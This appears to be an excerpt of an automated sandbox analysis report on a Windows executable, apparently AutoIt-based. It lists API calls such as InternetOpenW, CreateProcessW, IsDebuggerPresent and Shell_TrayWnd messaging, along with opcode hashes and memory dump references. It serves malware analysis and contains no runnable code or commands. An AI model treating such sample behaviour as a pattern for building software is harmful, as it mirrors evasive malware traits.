                                                                                                                                                                                                                                                                • Opcode ID: a274a0a0779338ba89815ba82c07264c40002e346f1b6731232be186aef97803
                                                                                                                                                                                                                                                                • Instruction ID: 4a8e319cccdcf8f995574926788dd6f1e7864de1726ad0b75d04f55fa2c0ba38
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a274a0a0779338ba89815ba82c07264c40002e346f1b6731232be186aef97803
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB511335500246DFDB15EF28C491AFA7BB6EF25310F248159E8919B390DA369E43CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0070461F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00704634
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: '
                                                                                                                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                • Opcode ID: a428897fae623c181d0174767a431a04364768d01ecf9f42951bacff054565e5
                                                                                                                                                                                                                                                                • Instruction ID: 5d6dd8c435de3d0232793154759a2e383d9cd8d8182ce985f5a5e832780e1048
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a428897fae623c181d0174767a431a04364768d01ecf9f42951bacff054565e5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 123127B5A01209DFDB14CFA9C980BDA7BF5FF49300F10416AEA04AB381E775A951CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006ECD7D
                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006ECDA6
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                • String ID: <local>
                                                                                                                                                                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                • Opcode ID: a3b063257298f4fee9b3ece8ec98a2d68826a830106e4f1af4b825f6f0a791a2
                                                                                                                                                                                                                                                                • Instruction ID: 29a35a9c926faef69157483d5b35b10a4c423e878ba18404edcca6296bce2e2b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3b063257298f4fee9b3ece8ec98a2d68826a830106e4f1af4b825f6f0a791a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F11C271206771BAD7384B678C49EE7BEAEEF527B4F00422AB10983180D7769842D6F0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00679CB3: _wcslen.LIBCMT ref: 00679CBD
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?,?), ref: 006D6CB6
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 006D6CC2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                • String ID: STOP
                                                                                                                                                                                                                                                                • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                • Opcode ID: 114d275ff948d10c4ef51529d2380f29df893b15ee3cb0d91eab667cb0d42bd2
                                                                                                                                                                                                                                                                • Instruction ID: b7da242472b0479b2bc52e47365ef324eaaa8636b9f5b4e410ec808ae10501f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 114d275ff948d10c4ef51529d2380f29df893b15ee3cb0d91eab667cb0d42bd2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8601C432E145278ACB219FBDDC819FF77B7EF61710710052AF85296391EA35D901C650
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0068A529
                                                                                                                                                                                                                                                                  • Part of subcall function 00679CB3: _wcslen.LIBCMT ref: 00679CBD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer_wcslen
                                                                                                                                                                                                                                                                • String ID: ,%t$3yl
                                                                                                                                                                                                                                                                • API String ID: 2551934079-2110182000
                                                                                                                                                                                                                                                                • Opcode ID: 802f4e3b16015162c114dabd785f7d05a0901561baf361ab54adc8534ccc76b9
                                                                                                                                                                                                                                                                • Instruction ID: f923746ba7ee8dbe3c3f33cee556628f27b6f087615ecf9eebc2f5a0be25da18
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 802f4e3b16015162c114dabd785f7d05a0901561baf361ab54adc8534ccc76b9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8012B317006109BEA04F7A8D81BA9D73ABDB05710F50426EF905572C3DF645D428BAF
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00743018,0074305C), ref: 007081BF
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 007081D1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: \0t
                                                                                                                                                                                                                                                                • API String ID: 3712363035-315198736
                                                                                                                                                                                                                                                                • Opcode ID: 20b86d8cb5554909b0ab7e39c25eed8db1b51fd9858a37053c1d23ce03e0d935
                                                                                                                                                                                                                                                                • Instruction ID: 3ec7e80eda04f39d2082f7ea7f465d65c09c3dcb05f2b6d29c7cb1a7cf988cb1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20b86d8cb5554909b0ab7e39c25eed8db1b51fd9858a37053c1d23ce03e0d935
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03F05EB5640304BAF7206761AC45FB77A9EDB05750F008626BB0CD61B2D77E8A0082BD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006D0B23
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                • Opcode ID: 0f9330a6f1f960f2e8457b2052834e1d40f5d820ed0faf0e97183e3b5a7c910c
                                                                                                                                                                                                                                                                • Instruction ID: 48bc33df4ec890a23a3d6c981182329975b32786df0e240bb65c7cee553cb16a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f9330a6f1f960f2e8457b2052834e1d40f5d820ed0faf0e97183e3b5a7c910c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53E0D832244308B6E2553754BC07FC97BC58F05B51F10462FF748955C38ED6249046AD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0068F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00690D71,?,?,?,0067100A), ref: 0068F7CE
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0067100A), ref: 00690D75
                                                                                                                                                                                                                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0067100A), ref: 00690D84
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00690D7F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                • Opcode ID: e2b1c92d00ece44d71a11aa76a43953c7c7c532d0d211ffd4116ab3fc8679368
                                                                                                                                                                                                                                                                • Instruction ID: 84d08cba9686107ffa1b778a145251560400b4e5d265fe0c4dfadbd5781e3352
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2b1c92d00ece44d71a11aa76a43953c7c7c532d0d211ffd4116ab3fc8679368
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7E0E574200751CFE7719F78D8047467BE5BF14744F008B2DE495C6A51DBB9E4488B95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0068E3D5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                • String ID: 0%t$8%t
                                                                                                                                                                                                                                                                • API String ID: 1385522511-3566158117
                                                                                                                                                                                                                                                                • Opcode ID: c6751414d57b6b24c93a67b00644b7c0f6f7a20d700845a1f27cb42980dc9835
                                                                                                                                                                                                                                                                • Instruction ID: 59e153d56623755417a78dbd24c9b2578d5d4c12cd231532948f9ebd29b700bc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6751414d57b6b24c93a67b00644b7c0f6f7a20d700845a1f27cb42980dc9835
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE02639508D10CFCA04B718B854A88B35BEB06320B9042FAF102872D3DB392C63874C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0070236C
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000), ref: 00702373
                                                                                                                                                                                                                                                                  • Part of subcall function 006DE97B: Sleep.KERNEL32 ref: 006DE9F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                • Opcode ID: f90b3d50f566237a22fa4b7b694f1ee596aa806da4cf3f0aa3906a45c069a2ea
                                                                                                                                                                                                                                                                • Instruction ID: dc56aaf86460a58cf71506c165c9a5b7d6318b27ad9448f60ddaa372c8b6c3f4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f90b3d50f566237a22fa4b7b694f1ee596aa806da4cf3f0aa3906a45c069a2ea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FED0A972781300BAE2A8B3309C0FFC666089B00B04F108B067201AA1D0C8A9A8008A58
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0070232C
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0070233F
                                                                                                                                                                                                                                                                  • Part of subcall function 006DE97B: Sleep.KERNEL32 ref: 006DE9F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                • Opcode ID: 3051555868429f236be361eda1b175ae5e93d83f3aedc2a3c5fd58af8fbf2ef4
                                                                                                                                                                                                                                                                • Instruction ID: 86fd1a057ade134631c4dcf0a8456e93ad79aed1458a53bacfa16168b411b268
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3051555868429f236be361eda1b175ae5e93d83f3aedc2a3c5fd58af8fbf2ef4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DD0A976780300B6E2A8B3309C0FFC66A089B00B04F108B067205AA1D0C8A9A8008A58